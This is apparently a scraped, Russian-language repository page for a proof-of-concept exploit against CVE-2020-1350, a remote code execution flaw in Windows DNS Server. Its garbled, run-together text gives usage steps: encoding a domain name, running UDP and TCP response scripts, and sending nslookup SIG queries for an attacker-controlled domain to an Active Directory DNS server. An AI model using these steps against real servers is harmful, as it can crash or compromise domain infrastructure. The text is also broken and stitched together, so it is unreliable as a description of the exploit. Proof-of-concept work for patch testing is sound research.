
Эксплойт-доказательство концепции для CVE-2020-1350, критической уязвимости удаленного выполнения кода в DNS-сервере Windows. Демонстрирует эксплуатацию через специально созданные DNS-запросы.
CVE-2020-1350 Концепт-эксплойт
33y0re.com)blah — это 0x4 байта, а .net — 0x3 байта)domain_correct в \x04blah\03net\x00python UDP_Response.py и python TCP_Response.pynslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP, затем: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP